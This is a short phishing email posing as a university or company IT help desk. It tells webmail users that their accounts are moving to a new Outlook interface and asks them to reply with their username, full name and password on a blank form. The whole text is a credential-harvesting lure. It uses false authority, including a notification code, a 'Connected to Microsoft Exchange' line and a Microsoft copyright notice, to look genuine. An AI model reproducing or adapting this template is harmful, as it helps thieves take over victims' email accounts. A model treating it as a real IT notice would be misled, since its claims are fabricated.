IT Help Desk

This message is from ITS Services to all Web-mail account owners. We are removing access to all our mail clients. Your email account will be upgraded to a new enhanced Outlook interface provided by ITS Services Desk. Effective from the moment this email has been received and response received from you, ITS Services Account will discontinue the use of our mail Lite interfaces. To ensure your e-mail address book is saved in our database.Please reply and enter your Web-mail logins on the admin data based form form below
Notification Code: ITS0875US

Username*****{ }
Full Names*****{ }
Retype P*****word****{ }
Staff/Student/Other{ }

IT Help Desk.
Connected to Microsoft Exchange
2015 Microsoft Corporation. All rights reserved